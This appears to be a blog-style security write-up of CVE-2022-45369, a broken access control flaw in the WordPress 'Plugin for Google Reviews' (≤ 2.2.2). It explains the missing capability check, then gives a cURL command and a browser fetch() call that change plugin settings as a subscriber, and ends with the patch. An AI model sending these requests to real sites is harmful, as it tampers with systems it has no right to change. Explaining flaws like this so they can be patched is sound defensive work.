CVE-2022-45369 - Exploiting Broken Access Control in ‘Plugin for Google Reviews’ ≤ 2.2.2 WordPress Plugin (Subscriber+ Authentication)

In November 2022, security researchers identified a Broken Access Control vulnerability (CVE-2022-45369) in the popular WordPress plugin Plugin for Google Reviews (versions ≤ 2.2.2). This flaw allows authenticated users, including those with just a *subscriber* role, to perform actions that should be restricted—potentially leading to privilege escalation or malicious changes on the site.

This article will break down what this vulnerability is, provide a step-by-step exploit explanation, share example code, and list dedicated reference links for further reading.

What is the Plugin for Google Reviews?

Plugin for Google Reviews is widely used to display and manage Google My Business reviews on WordPress sites. With over 50,000+ active installs, it is often targeted by attackers looking for weak points.

Original Advisory

- WPScan Advisory: CVE-2022-45369
- Plugin Changelog

How Does the Vulnerability Work?

This plugin exposes certain AJAX actions to all authenticated users, not just admins. WordPress AJAX actions commonly follow this skeleton:

add_action('wp_ajax_action_name', 'callback_function');

The developer error: failing to check or enforce current user roles/capabilities in the callback, assuming that only admin users would call these actions.

Example vulnerable code (simplified)

add_action('wp_ajax_g_reviews_save_settings', 'save_g_reviews_settings');
function save_g_reviews_settings() {
    // Danger: No capability checks!
    if (!empty($_POST['settings'])) {
        update_option('g_reviews_settings', $_POST['settings']);
        wp_send_json_success();
    }
    wp_send_json_error();
}

Here, any logged-in user (even a mere subscriber) can call the AJAX action and update the plugin’s settings, which should only be possible for administrators.

Exploit Example (with cURL)

Let’s assume you have a valid login (as a subscriber). The following cURL command exploits the vulnerable AJAX endpoint:

curl https://targetsite.com/wp-admin/admin-ajax.php \
 -b "wordpress_logged_in=YOUR_COOKIE" \
 -d "action=g_reviews_save_settings&settings[review_badge_text]=Hacked by Tester"

If logged in, an attacker can run (from browser console)

fetch('/wp-admin/admin-ajax.php', {
  credentials: 'include',
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: 'action=g_reviews_save_settings&settings[review_badge_text]=Hacked'
}).then(r => r.text()).then(console.log)

Mitigation

Patched in: 2.2.3

The developers added proper capability checks

if (!current_user_can('manage_options')) {
    wp_send_json_error('No permission');
    exit;
}

Reference Links

- WPScan CVE Report
- Official Plugin Page
- Exploit Details (Packet Storm)

Summary

CVE-2022-45369 in *Plugin for Google Reviews* <= 2.2.2 is a classical case of “broken access control,” allowing any authenticated user—down to subscribers—to alter plugin settings. Attacks are easy to automate and exploit. Always keep plugins current, and check for least privilege in any AJAX handlers on WordPress sites.

*Stay safe and keep your WordPress plugins up to date!*

Timeline

Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/23/2022 13:20:00 UTC